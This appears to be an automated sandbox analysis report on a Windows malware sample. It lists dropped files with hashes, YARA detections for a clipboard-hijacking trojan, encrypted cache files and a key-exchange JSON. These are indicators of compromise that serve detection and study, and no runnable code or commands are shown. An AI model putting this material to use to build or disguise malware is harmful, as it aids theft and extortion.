SHA-256:	7A087C1BCD038C61DDB0F634F9B21E6DB9BED59842F19ADEDA48B49ACB20E16F
SHA-512:	09CAB8CCEDB9E53D6D2725E8B9DBBE8FA9552607A58D89876B6539A6612B2E7AC0440EF281971BEC9191510915FA6264048510ADD493E6A862B0D3B4F006E342
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 45%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r..%6..v6..v6..v...v7..v(..v'..v(..v_..v.p.v1..v6..v...v(..v...v(..v7..v(..v7..vRich6..v........................PE..L....W.a.....................H.......N....... ....@..........................`......K,..........................................P....0.../...........................................................-..@...............4............................text............................... ..`.data........ ......................@....rsrc..../...0...0..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build3[1].exe

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.3362059272001
Encrypted:	false
SSDEEP:	192:9UEc8b6H1LE+4LoGgMatAJ2lzUw317NyEpvNHhqyo:9UUE1BYoGza/D3170kiyo
MD5:	9EAD10C08E72AE41921191F8DB39BC16
SHA1:	ABE3BCE01CD34AFC88E2C838173F8C2BD0090AE1
SHA-256:	8D7F0E6B6877BDFB9F4531AFAFD0451F7D17F0AC24E2F2427E9B4ECC5452B9F0
SHA-512:	AA35DBC59A3589DF2763E76A495CE5A9E62196628B4C1D098ADD38BD7F27C49EDF93A66FB8507FB746E37EE32932DA2460E440F241ABE1A5A279ABCC1E5FFE4A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build3[1].exe, Author: Joe Security Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build3[1].exe, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build3[1].exe, Author: unknown
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................o......o......Rich...........................PE..L......a.....................................0....@..........................`............@..................................:..<............................P..,....9..8............................................0..0............................text............................... ..`.rdata.......0......................@..@.data...`....@......................@....reloc..,....P......."..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\geo[1].json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	500
Entropy (8bit):	4.502038548996588
Encrypted:	false
SSDEEP:	12:YZInGK67kt/QVFRbIm/QVAY9QVFRHQVFRRaZRQVFRQQVFRUm62jOd:YAGKhFQVFRbI0QVAY9QVFRHQVFRGRQV6
MD5:	7ED76A8CB8A6D29B280030E8457CFE60
SHA1:	A20622999CDA740B336FB48D0D563F01A8BCE016
SHA-256:	3E0360FA4DE5E22B8D7C6E89CB252296E25DD99025029EADA192A19ED3A260C8
SHA-512:	D5BCFAEE04164D43F9E83AE4AFF388CB115835BC874FD2F994F873666567EDBF2D5EE2C0FC37D28F5DADB17B63E0C6F690D1E26C44D9E99BD7389176E4FB23CC
Malicious:	false
Reputation:	unknown
Preview:	{"ip":"102.129.143.49","country_code":"CH","country":"Switzerland","country_rus":"\u0428\u0432\u0435\u0439\u0446\u0430\u0440\u0438\u044f","country_ua":"\u0428\u0432\u0435\u0439\u0446\u0430\u0440\u0456\u044f","region":"Zurich","region_rus":"\u0426\u044e\u0440\u0438\u0445","region_ua":"\u0426\u044e\u0440\u0438\u0445","city":"Zurich","city_rus":"\u0426\u044e\u0440\u0438\u0445","city_ua":"\u0426\u044e\u0440\u0438\u0445","latitude":"47.36667","longitude":"8.55","zip_code":"8099","time_zone":"+01:00"}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\get[1].htm

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	562
Entropy (8bit):	6.004306380445212
Encrypted:	false
SSDEEP:	12:YGJ68jCgxGDzkN3JOtCk5JB0Rmon551RY:YgJjCgxGDoVJOtP85C
MD5:	4A8E8964FF3AC7CC66DF3D05E1F1CAFF
SHA1:	3E064FE27192B89495C3E7D9651501C66D5EDA7E
SHA-256:	B31DA4E530570DC412FE33DEDB191D47ADCAF5A5ABCF28F6A8B6BD0E61D8E822
SHA-512:	519661E87D1DE54732BC42DABCFF566D46C7276C7236D35120CB062A55056DC00B8FCFF92E6EF4080723532ADE9F57206DD38AF98A4F85D593743090F4874BBE
Malicious:	false
Reputation:	unknown
Preview:	{"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4JUPXhcOp9V\/E9lxZsEK\\nQe0LUR7FxIX9+2W\/X2nGeRYy5d6\/xkuTwI9LDuBuUNYLLpk8ApSfgL7rrE3dMau1\\nSyoJF72mzdnvv6SaBYXrIJNz8GbP6zjiooN8Mmd3gSfmYXFA+8EVjQ7MS6hjDmYc\\ngAURmQQ6YgflQ8\/eT32+jGqsu8HLk3tX\/egrA2Ot0F69KJOKwd3PmuYEFZzlZn5Y\\nSWYZTferj\/ve8i3LA9Q2chI4RxkgCrBYyc8qZHdSlvlVZW7XS4ko\/ZA71w3CVuMJ\\nEbEuX5NknWYwyA5HCIdf1Rp56kL5cui7mf\/Px4sp7BywNy2BSUiAeUOMNdzWgXjP\\nTwIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS"}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\MSIMGSIZ.DAT

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	49454
Entropy (8bit):	7.99601147550486
Encrypted:	true
SSDEEP:	768:/QE7Uxuqtl2WjfVcz2RMxTsXiIVLirsJrXo9a/L04rlELAMdMIKpSrXRM6PlSZRm:YE7aPWlts9Xow/vmMNyrtSq
MD5:	763B0B08AB2786BCA831FF3A08B540A2
SHA1:	2A598C6EC0BA38CA54803339E4B7FA43B702EF26
SHA-256:	29EF828E030EF09C4FA572E4443C7634CE77A4A74603BB97006890AB70EFF943
SHA-512:	D67366477AFBEF63FC1382177E0FCF7BD9102343A4784F38AAA4601823E12BAE549AD229FDAF04B6AB5F892AC6BC766FE1EDD705535F97CE68210682402D8FE0
Malicious:	true
Reputation:	unknown
Preview:	........H'....Rg=\|.kP.Q.b..0@{..g...I..1#......j...\K>.'>q..._...../.....z...#./H......).8r...G...ZPh.".22...6{.T.....4Q:.2........V.....F..f..A....b,.@a.z.....Re.Sb?.Z..)s...k=5.,(....HT.\|Kib........}...xc...4.`...e.o".r.......7.....m....Q...X...PIu..5..0Z.a.ngv..N2..:.BFa1....A..E....9q......;.?)\|...X;C/kJ.P..v.j.....G"..,..c.....K...X......d..N!....oZ\|.Xe.....s6.u$.YS..^.{.HE..D.8).C~:..8...\.4~R~.m..TSF.3-...N.f....'OW..#+.X$~1.......S.V.I.=j.7.i8].h...D.4[...u.....p.......I.}.....5..X..i..\|.l=./sg=..[..+B.......Y....}....>..c)d..y2...Q.lG....9P...?b........E.R... ..n..V.F.U......7....}{....e.......^_+.@%FW...o.....}....`...>J/.a..@...t...O..........a...Wt....`..#.K...?Y2.....<....J0..B.ljc.g@..X....I.V...R.2Y....(vT,.(4..L...+..H.t?l5...-r..Vu)..wF@WG...;>...8..W..qX.g.a..QWlIc..N.[. ..a....K...B<C.&.xd...\|l...):.....%0sO..w.}..:../.&.....m[3Rv.9..'.2....s.8.....dL.)...2......gs.A......5[..b........w..UyP.A@..Jsv.Rx..8L....~...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\SmartScreenCache.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	123350
Entropy (8bit):	7.9983303108315695
Encrypted:	true
SSDEEP:	3072:WMu3agWD0x5iNCgDCxgMvSYecj1KicervjcP+:WMKWDCb2C2cdx1cekP+
MD5:	8C46C5780F5706F688FC8E3A5E54D32B
SHA1:	80B3665F976901070E8ACF2B6B8046D0F7963979
SHA-256:	BF94A7EF62A12893AE32BE08B274EABEE938D38E3E62C36738C7BD9EA9901C88
SHA-512:	7F540F878521B99D23DE659A8E4967848B01829F7AF1F3AFE575801F95ECD0379DE6565E1943733F6A7E35E2D681C56CD5E49A9D631FB4062D8E8B6D5196FCD1
Malicious:	true
Reputation:	unknown
Preview:	0.rJ..v..f...._..%.eR..S.z;.o!..R.........6..1....w..9dD.\c.!..z.;S..:....k,=H.....o6.?.M].bw<v....\..y.YB....D. ...po.....rU...8nb...B.......gu...1,..u...s.;.y...T2.....M....j....t...2.)..>)\|K..;..,l`v.....#.d.)........(ID...k.9.Y$.de\|Z...Ar.0)...J......j.R........K+....$...,.p....(]0..'..6$.TU.>.LD.\|...o/T...N.G.S.I..k.a.a.v..>.xB.z;..S.....bl\....W..W.?.Z.Jy.c....o...U.%...XH7.....)..6..8.D.)U`..4.%....`".D...Qh.c...........p.......S.G.RB..f#..,#.{8j...k@....Vk{.qe...(..$.!;Du.y.]q..Py...)....Az.z..Q..f.x...,......U-:.S ."`..qvc".o...i....., .5(..B...q..7.E..Z....~..1.....}....<yJx}.{fA+r.-\-.W...0~7?.........3...w.i........ b...}Z..A.u..6..B..zCd...T......B.b...:o.c.@'O...X#MKRW&.kz.r.r...o..RuS...%8`...$:pZ=.\:e.......vO...>D.Y.E..o{...\|..4.cYE.'sP7B.....C(V.s%.%`...:.....'r.r0.~.v...0ei....[.M.h.&h..a.....UcH..%y#...t8+....4*l^.5.O._..5...\|.B$.s.....XS.......M.<...F".u..u`.....6?..b../..S......W..J..6.&.7..h..u.%R..I.'.1.,.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\deprecated.cookie

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	425
Entropy (8bit):	7.430366283251364
Encrypted:	false
SSDEEP:	12:ADIg4CcDf3tqwMRBLNOboq9nIn7CFDtcii9a:ADQtqfLNRqq7CFpbD
MD5:	3A8DE3DF0E4F8F238711095B5409EE40
SHA1:	18FC22B60D47C0E86A62AC8818BEE6F2B2BAB399
SHA-256:	22356A7BE7E7CACC807884F25A82FADB3B79661400D77A98D8AAB87B5C856C06
SHA-512:	FB3EA308940283394C911BDA6E2C1FAB50ED4DF9117FCC2CF6324610BC6EC2789F17C46C3F9F58E0F1B6FB3F25B5303633CCE5BE42F3ABE3F54FB8895F81E167
Malicious:	false
Reputation:	unknown
Preview:	Cooki..!."S.....K.a.Y)..uk...r.."}.6.N.....'....B.}Q.. ......k...[b.i.r.X...t.%_(..f&W'......w.@\|..;....,....?b.p......j.....)..E.\..\..9.V..:.g.+G......^.]-.X..n.p.g.....n.'...\|....4`\....I......=Y..E....=....Z^....&..........6.........M..A.K.K....b....R......&...g..OaN.....z7.....Y..K..r.Q.^.ED.........<..ex...e*...T....t...K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	118275
Entropy (8bit):	7.9983377415289985
Encrypted:	true
SSDEEP:	3072:LQPsKwLKAycWXYwhxaUNXDqTPMuEkefOId:e7ncOdxDqTPWkefX
MD5:	493483A03D007032627929BA2491C51B
SHA1:	01C531AA85C6DE05B7A47C33B2BE87EA1C17DF15
SHA-256:	B818F7D64FD197F88E4969A006216746A8434966607271EC184DD92C5BA1A792
SHA-512:	D29EEF050830B4441E6F77A84CB56D2D95F27675499E6F5D9852A7D23F0A71652C42492C7587B4CA8E9862D5CC690392904D0C9E37718ED90EAD62A90461CBA0
Malicious:	true
Reputation:	unknown
Preview:	<?xml.x..I.u.\|.\.e...Z......-L..b...b...p.....\..bq......\|.H....l.X...m.2...N.6.T.)F.>.bL.y./.C....h..e).....LR......S..0....`.v.......y...cI..._..YU8.f.1..<...n./...^q.1......i.^!N,..C.\.v.2pE........$....p?....q.H[.m...A".Xh&qk.....h.P.i.k#Zj.j..b.W.q.P.yS..XXv..N.GA....P ..A.s.).e.U.......`.S}{.U/.....VU..v........:{[.hxb...l%..#...xY.m.5~.uD.I...6>.wL..$."....-.0a..2....`]....L.:....Q<EC.l-..M...=..]F..uy?K.:..P...N..=....u.....%.......H.!....\r.4..%0..}...........c+.t..k..<...B.o.tXFP+.[..`sP..}5..+!..qg..~.......+{..9.v......;.F.0F-.U......_.l+x........-.#4j....n..d......;.O_\le@~.....V.32........4..\....].9.. ..8..k.jA....6..../-.........;P..r....x.....D..1.=.&W.'G.f!-."6..{E...z........7...A....d..W.....l.... .{....,..........4...S/N...mv...QD..EHH..V.%7.Q<...U1......v.n+r.o..Y<'Y.....or.:p.O/.hIL.....;....$....w........@....}.._....L\|sy..J.'..gD....[i...z...'.^.,..)"..`.D@E..Q.i{]p.....[.....s[..g..^j.].p...v.....u.90N

C:\Users\user\AppData\Local\Microsoft\Windows\UPPS\UPPS.bin

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	PDP-11 overlaid separate executable not stripped
Category:	dropped
Size (bytes):	16482
Entropy (8bit):	7.988001103115078
Encrypted:	false
SSDEEP:	384:EbMrMH3FM/c/vORqoPapyiOPgLjI2LjCm4bna2:EtV9/vkPapoIXIq4Lh
MD5:	3D0B3F7EF01683F8711127C691E2F80E
SHA1:	BD6629FD04B17668AC43BBD24ECBFDBC0DC5A05F
SHA-256:	5D5B670DB7DD5AFCBF0FAF90E5F332A56C64A6B7462DC474533C0E3EA6F01558
SHA-512:	A4665A1A2C3C6751BECC92C4AA415DCFDD097D4269936A987BF6ACF17C7A5609548A2890997E4B3E74F27FA4AE151E12001CF4B396120E2FA75E6F7C388C9FB0
Malicious:	true
Reputation:	unknown
Preview:	......,.I@..A#...4.\ ...!u.a5Ka...,m;.)N.....G......V?..W....9.,.Q...[..;%\|G..T.d...G#.N[...0.......X.^.kS.G...^..m..J.....B.w.!br..g..Hj...i..N..`...BuG.C.../.H......'.z..Z.j..j....d.\....y4...........K...+ZG<.@Y..i...H^.(#..B.?..........H...>GJ.g8.5.2....... ..[b.......a........Iq`M.....M.R.&...5<..... .4...x'"m.w4L.....G...<K.\|XV.....3C.%.w..CAt..S.ip.7...f. .=..![.w.Xu."......Bk.PlZi&.b..n<R..m.1.cc$..(..%-..6..a.t...+.......F...n.-g>vf=.w..`~.dn..p7.p/!..z.....)=..{.-&.QO.x.\|.V..<.@K.}.BJM-....... ......".s.WA......rz.U.HH/'...........S(..rl.....:...N.j.....@.C...^.]........s.^......M.D...{........[...;.E'M9.z..QI..........<]$.........2./Y.Z.h..l........<...M.x..9R...,.R..+.....H..s.a...E.oId.-..,.N.G<^..g#..sp.Rz.....v.=\~qb...A.^..t.....$H.Q....mzu....,>k..Bn..j..X.........\|>.}.%..bMc..,MvF.x^..k..!...$N...=nQ....R.@.+/..KCy^...S..#*^0C.?...-0......:.2.[.b.K......k...oC.d7..J..\|.{.....W.....O;:J.nDgfX?y#.......D..+...!T..\|.n...\|n

C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.977603612155621
Encrypted:	false
SSDEEP:	192:BppZXsg6URBs0FsUWJQlmpygh/e2zrI5lTWBJHCRcGG9cXXs:8g62B27ogs2voN4uc9cXXs
MD5:	827926454A6FC2C47E7CBEB700BC4BE4
SHA1:	663A5ED72BF50FAB69490239CEF97CCAFC9E9D00
SHA-256:	46C8B13BF8F28BDF71E1ECF7BBAE98BF8FDE655D365F9CB9415F80FBA2165D55
SHA-512:	EC6E556EA6C2D43FE81C5C8988197D97873F3F6E5FC4F7D3A6E549B813623CE915FCB40E9C557D820A16EEEC2EE018A74B167233A530BF0649AE7F671AF7F075
Malicious:	false
Reputation:	unknown
Preview:	..r].......D.......hc...a......mR.0.Z....%[...Yq...`).U...A".-.Sa.,..O. g,.m...d........mz.5..`.b>~....C..K....=..v...J:........x!7..G.i3!%...$.Ry..'l.}'r.w<..D....#P.}..o...7Y.."c..<.J\.yU... .F......h.nh2....-. #.Ea{T..j.a.Ok..........UX ...j...UxlHm..vj....>T........vu..<...........`........lFN.......W...C@^.).fs......t.`.r..;.........}n....\|5>.m.%........d..c...NRA..;e.w.j....h...K.i#..QBL..6..}MD....Y.. .OM.S..$~.6.(..T..~.j.~...\.C..9..U\|..2oC.z..7...n.t^L.....&.d..=53.]....s.....#.(.v...b..n...skL.....'.@..4Z.J......^....j.S...p`...I...\|=..n.u^.cL]2].t.Hq.@.wmp)..Z.....5.... ..:...^..Y$u....}..e..$...Z...K.)..-.@{.N.{....^p.CS.#) =.Qw..1y.x.^..#.y..\3..G....lb_n~(...f'...,....;...t.dfJEhb.E.:F....D.S%x..fN.k..\7... ?Y..Rra.K..I..y...~..Xa.S...t....~.GN.: ..1. ys........M.7....u. .w.2sHl.&.x\|..5. ....5.l..<tj.u.........qca...<.nld...8.,0.......9.M..E......,.iS[...&.......wg.87N=........~.6.H7...e&f..%....-...8 Rg....^..+P....

C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V0100009.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	524622
Entropy (8bit):	5.428239273896568
Encrypted:	false
SSDEEP:	6144:VmEu1rJ82+ocGGy4ufJ3zV46FNfVZHKjvoKnaTXIiSICefMHMD/:VmBr7+kkux3ffejQr7
MD5:	9476CD82E7FEAE1BF22D0E2A0FCFCCA9
SHA1:	3A150C4A0F812432674282248D50C882F6ADD7B5
SHA-256:	6DA12575AA3CDFBCEF460DA957D8302F18F4F5AD6A336FD75871A16CA17E5D71
SHA-512:	72EC06E6EC08AF6561E0AC1D1A0B39AD283A57D321BFFB94D4586500E568F0A2FE11398AC51BADAAE7D9245C8E5B889760262C89168F09CC5F301DC39963C153
Malicious:	false
Reputation:	unknown
Preview:	...:.P.+v...p.Rz..4..98....=.?......m`.g....n...\-R.k....=:.........0...../..4..{.x....6R.bx.uG)$.^..\|wy....&.F.y\|...F..n.....".o].+e.y.FM..'\|$......Z....u.o..E...FkK}.+.o.....cm.[..C...i.U..7hnG/...U...%...Q...p1.n.....H.......p$~e.EN..n(.>.4..!..SPC.3...q.t..cJJq.U.A..9.W.hJ. W. <.......>...$.F....e(.LX&...d...1\.E.M.."..86.....f5o...N=.Y.2.^.b...;[)m..&h......uOB...3J@........&M..?....S./0O\r..(......N.1.]....z.1..T.k....V...b.e..+ ....).. .S..\|....I..p....'...I..a..&2;...+.....d...~EV.c..jT"xA..o........l..n..,=...Z...c#t...I.s.dR.V.)0..3MZf..P...k."..-#O..'...v.........P.1.fA\.r.,<..d....t...~..f...2..Z.W....N..,(.nc.v....O\D.>T.1Fv5`@c!.\...r......Jnf...L%."...U..._...."!.!"..+........>..W.Xv...w(fY..j...?b..E..q......9....B.T.nWqh.p..=...e....M..w'.9.p..8W.lvO....rK....{W.0....#.@.....(.=&}...L.. ..(.X...K....V.o.....@...&.h.BL..o.P!.....;..9...........2.._.D...9......M..lGj.....r....,Q....5.Il&e......NE..).....V[.p

C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V010000A.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	524622
Entropy (8bit):	5.852598956637424
Encrypted:	false
SSDEEP:	6144:Kz6EUKs9CqgSFp3DzYZk3LcYpHDCOVx1COTvBFUyMquiyMchBg:vEuFLftbeOYyMquK
MD5:	9350BFA910A7A42A236BE9C1C60329F4
SHA1:	C0B0E5D44B34C629076E5BC730EB24BA34CF44AF
SHA-256:	973DB22AFE6E18830352F845FDF72B18BC9BE577206E8CD3FD7243C03D6FFC50
SHA-512:	C7CDFC332BFC41DCD58CB77BC1598CEF07BFC8B122834EAFF0B119DD39908FA5E5F4637413DCDAF4CD5D19939DE8551A5CA3D8E469C3EB4676940D67814D73E3
Malicious:	false
Reputation:	unknown
Preview:	.....2..../....v.`.KT.0s....(.g........_........V...;^>=...V....G.ov...(.7..%E.J...+qXq.mH.[.._f....M....\......+...R......ko.......g.........0.=`..........e8....b#..ay....D..4.Z...2...k.^G..V.?..%q8........`{.V.k........k......r1.#....J4.g9u!5.Tn.0.U.7%..T.Ry.X.0.cm.r.k.+6#y..x..:......4..3."..7.;e....AbyJr..^..._.....8.[...O`.6.+i #.5..Y)Y...'....`!.<....@..@1.L...G..d.1...-.@h....D ..9_......].........m./.A.^........\|.\._.3i.,p..i.O`.....t..(.,.....!H)...$F....c.~....=...<..Q%.......:.....M/\|`..\|y....\...q......I.7..!'..>.f*H...H.B..j.S;.L}...E..z..,...R..F.}.R70=....s.[.r..x.\|/.wOb.M.T}...<.9.pk.ak7Xm"..p....pt...{..M.#.@.EI..z..2..$..Y......@.pN..p8....."f<...T....%.Fq,,_=..F...X..s.A\..BuS.l.....o.....X..U.n.:.g....xw_-...e.\..M..^P...a.J.e...d.f.7....t.. w..u..r..i....B.U..F....[.M.uH....M...tQC...Tx;.d.F...@^.<......Y..$....\P.$.....?p.R.`.#m.`i.gS..........1K.......A...7K..d...4<...RE.L.].../.d.....t..e..J .>...9>,b...

C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V010000B.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	524622
Entropy (8bit):	6.162587182034906
Encrypted:	false
SSDEEP:	6144:837y5IT4QtSPThOa4MXkhzaNlhJ8RBGE3BVVLZt1o:83wIT4QswaSh+b78BVPo
MD5:	F7696017A12CAD097855210BAB257AB9
SHA1:	FB6B75586A36FFAAC840A8BE20F554CA92C4E01D
SHA-256:	3C6F57F467580F7702790256D6CB18DDE49B125E6451900F00F334742A50A899
SHA-512:	6126795E706110CCBC5985789971D6B854CAD08F4D8580EF316305AF338C3F8CD78EFDB27062B087010CBBE8C7A8ADA84C6729EABB511EDBCC2FAD52C822EE81
Malicious:	false
Reputation:	unknown
Preview:	.8...F.!k[........=....9......s..$/.&..y_.,.r..q...le.~8.7n.jP.d...J-.z.......A%.&.7zI..?..-/....,=N.v.........~..lJC.B...H.4A..oV.-.>^.K.....+b?..\|Z.z[.....j.=I......x/.V...kt....;..Q.....B..~.9......E<.%..t....,~.P..{.E...%.<.Aw.2.U+I....n,.=..+.U ...{.L.h.......W....W.......P....JR,.j.OjM6..D.]..z....5..v'v`..Oz.;.R..H...L+4.....{...a....qX.8...~..]<.....z>.y....E.M..!.....T..PL...F.\|}....Ry.]......#q.n.$.!....9/.8.}.3a.T-)b.'t.b_...W..>.-.6... .Cn#.q.Y-.......Jpr...g^..~..(...'[E..c.E...s....."..[A.[+e..&.=.k..K..~qQ%.O@Z}0b.~...xQ...b.%.g.x.....VFT.%.}C.HK[a..dJG.b.O..A8.%.-T....T..%....)u..E+g..U..n.....d......hg.`........X..<...F.2.;......J..E...K......"...Zp....A%..C,&_......Y.{C!...%...\:.I.1.....O.d..3..M..Fu.`6....2V....@........l.G..)P+..Ne.]...&$.#..Pp._'.U..2...Q.k..3....:..t.".L..\|....#.<9q...?.;E..!?.....(..qX.......G.7.R(.M..C6N..-.[\|kdI).....'......U...X^..1.."j2.7K.7-O...e<.%5.o.r.m)P....a&7!#...c[....~z...2U..7]u....U: ..\.

C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01res00001.jrs

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	524622
Entropy (8bit):	3.2070092514043593
Encrypted:	false
SSDEEP:	3072:+41KHbbZFdmgjd2bVd5sKx1yu4Y5fhB/XKu3Qwa4pWUZkKX2:BaBmgp211x1s477QwFdk62
MD5:	EA72A5AF342FDE2115001D225E3092FF
SHA1:	FB630D85CC263D0ADE8417997E7B98C473958311
SHA-256:	9120EB80926C3DCD9716892258C9D0812820BCF83E9F55D80AF53460E59DDBC2
SHA-512:	07253AD48704A6734539193F472EE41A33AF8010DE481537C2E9976A3DA251071377C8D126A038AE996CF53B6D91D1B6BACD58686A1D9D1602730A8802284FC5
Malicious:	false
Reputation:	unknown
Preview:	......__.9.....c.odT..T.J.....]......#d..m{..>... ..G3...>L;'25&.=N...............5..36R.G+m.H...b\rV....T.M.......I1...{.3.....]..A.\.0{N...)(^.P%........[.~2.."..`.?...!..-..z/o\.n[gq.=...Za....G..9._..[....<...W./..M@.uW...".y...Oz...o.J..h8..CN.&Kt...:.&..aM)..1.5N,. Pb.1...$...!f.1...a;..1U...W..gA.f......p5,.....j...~.....(u_&`....k.d.r...l...p.d.......J&..t6....X......]_.%l....P.v......%..&....3..&5w..MZ.Y?c...J..........!..........b.1.....<..l./"...........@....>D.D......m\|..%?..9l.X.:......&c.E..W7..".p......2M[....F....5.Q....G.UW.&W..$.h..X.....i.....e..,.2\|=#...M.C.2..U....H.....3(.?.Z......z.pE.:..r..\|..G..+..F....7(.v=V.$...U.z.....X....r/....0..f....w .o.~Q.m.'.`].p.....M..u....Zw,.M.K!.........I..8..e%9..u.....e....7.I....!h-..^.A>..z..-.....Y[.a.G.W-. .[..w[Y0..4.p...)......rbb<h.<..L.......W..5..J(..A.e.'.Q..+..f.....t.S].p.+.n`XEX...Y..2`A..9....g.l......:...v....z7~..~..5._P..T.(:l...c.H9_..=g..^&I.x...D.:?l...oW.

C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01res00002.jrs

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	524622
Entropy (8bit):	3.2081125766772547
Encrypted:	false
SSDEEP:	3072:/jPn+0LDK4HyFF24fHHsEwYMn2+14PBtMJiabYrKdaMviUis:bFKSyFF/WYc2hB2Ju7MvVis
MD5:	DF4C86256AE71355996753702CB5A265
SHA1:	9EBB2C66F52C0E719C7563DA5E75B83D3EA93BF2
SHA-256:	B652B0DE387633A6B367B591869D5608268C92142F22CEB85969510A98CE3BA3
SHA-512:	0F6801E71ED916862865212C79F2551EEB14A75AA0B97AF233F423D52FA2713AC81DB2D5F540CD34D5937E2A5DB3891180331ED5B6BDDC0CC4E3C26374CB1CB1
Malicious:	false
Reputation:	unknown
Preview:	.......+JZ.f....M.rM...O..'Q.-.e.U...O.R.).wt..K..#.^z......<n......)....A.<..M.pJ"`...K..@.O.=...z._9.^...shF.......8_...LU...z..?(..`;K..yO...p(....5y...{......c..1.n~.WN..r.8....4..g...3...lx#.j.......\|.S._...<.:..wh..k.%.........\|k...I..oG."&..g......Z.p7..../...Tq.Yk.jF.....P_....lr..h.....T..(.Yej.B....X.~.<S.-6\|.^..........7..;..... ...=~.R.........L....&_q.&..u[.F...L'8...Un.rI3M.1.Q..&...FO.W4...b..;z.....r.1.l.W.1....g...v.)wJ..E&.......FT.G.s.;q...I.....P@.....l.........tf.L...s.u......Y{8d.$kl...z.r...,.....{s.Nec. >.XU.....:.j...r.`......6.&..G.....V.=.s![...Y....p.Z...zTZ.j...P.p.z...1.!)..:...i. .........0..Q&.....e...c.P@R..1...8f\...mPT...W.8.b.qG...^.A.>.[..f../....$&Y.4..W....vA.....\|..w=..p.+.../b.....d.../I..R_.s^.)...K.....YBU.......V. ..={>.F..&i[.T\5..14.2.p..h..\.e>}q+'Y.2;...[.....h.".W@..-....i.m.[..\Q.m...Z....?.Ge..<i.%.l.>o.zzs.7.'}..R..oL*@..J..N.V.B.].9.[.%>..bM@,vP."..-...r.....6.\. ...$..

C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01tmp.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	524622
Entropy (8bit):	7.316377527070837
Encrypted:	false
SSDEEP:	12288:lyYoiv2A3A3SsMh6+3jhmhrUd5dFdVAD7:lyYof3SL0rP
MD5:	C3081FEEA524307CBCFE594F5FAE97E8
SHA1:	EB3FEDE3D6119A056FC6AE4D0F7507F5D44069A7
SHA-256:	8914546C0333EC1CF54E4DB77306F272182512DD3EC6600C9541B7CE9A0B0799
SHA-512:	B55CE4AF8E63FAB45D417B4291862866487BF505EB72BBC4CDAC6E30467EE099654A045CF49B7A5A5D331E311159F2E8340D3AE001D7852CCF1F964858222A73
Malicious:	false
Reputation:	unknown
